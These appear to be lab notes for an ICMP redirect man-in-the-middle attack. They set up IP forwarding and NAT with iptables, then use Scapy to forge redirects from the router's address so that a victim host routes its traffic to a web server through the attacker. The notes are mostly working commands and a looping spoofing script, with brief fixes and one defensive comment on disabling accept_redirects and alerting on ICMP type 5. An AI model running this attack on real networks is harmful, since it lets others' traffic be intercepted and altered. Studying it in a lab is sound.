Enable IP forwarding and source NAT for the victim subnet
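#sudo echo 1 > /proc/sys/net/ipv4/ip_forward (the redirection is performed by the calling shell, so this only works from a root prompt; otherwise use: sudo sysctl -w net.ipv4.ip_forward=1)
#sudo iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE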
#sudo iptables --append FORWARD --in-interface eth0 -j ACCEPT (only needed so that forwarded traffic is accepted)
#sudo iptables -t nat -L
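- IP – gateway = 10.100.31.1 (the Scapy commands below use 10.100.13.1 as the router address, so the third octet here looks like a transposition)
- IP – victim = 10.100.13.126
- IP – attacker = 10.100.13.20
- IP – victim website = 10.23.56.100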
Use Scapy to create an ICMP Redirect packet (type=5) that advertises a "better" gateway for destination 10.23.56.100
>>> ip=IP()
>>> ip.src='10.100.13.1'
>>> ip.dst='10.100.13.126'
>>> ip.display
<bound method IP.display of <IP src=10.100.13.1 dst=10.100.13.126 |>>
>>> icmp=ICMP()
>>> icmp.type=5
>>> icmp.code=1
>>> icmp.gw='10.100.13.20'
>>> icmp.display
<bound method ICMP.display of <ICMP … |>>
>>> ip2=IP()
>>> ip2.src='10.100.13.126'
>>> ip2.dst='10.23.56.100'
>>> ip2.display
<bound method IP.display of <IP src=10.100.13.126 dst=10.23.56.100 |>>
(ip.display is written without parentheses here, so the shell prints the bound method rather than the field listing; ip.display() shows the fields.)
# Build and send ICMP redirect packets, using the lab addresses listed on this page.
# Meant to be pasted into an interactive Scapy shell, where IP, ICMP, TCP and send
# are already in scope.
originalRouterIP = '10.100.13.1'
attackerIP = '10.100.13.20'
victimIP = '10.100.13.126'
serverIP = '10.23.56.100'

# Outer IP header: the source is set to the router's address, the destination is the victim.
ip = IP(src=originalRouterIP, dst=victimIP)

# ICMP type 5 is Redirect and code 1 is "redirect for host"; gw is the advertised next hop.
# Defender's view: a host that does not accept redirects (Linux:
# net.ipv4.conf.*.accept_redirects=0) ignores this message, and sustained ICMP type 5
# traffic on a segment is an easy signal to alert on.
icmpRedirect = ICMP(type=5, code=1, gw=attackerIP)

# A redirect quotes the header of the datagram that supposedly triggered it, so the
# payload is shaped like a TCP SYN from the victim to the web server on port 80.
redirPayloadIP = IP(src=victimIP, dst=serverIP)
fakeOriginalTCPSYN = TCP(flags="S", dport=80, seq=444444444, sport=55555)

# send() transmits at layer 3; the loop keeps sending until it is interrupted.
while True:
    send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
# Press <enter>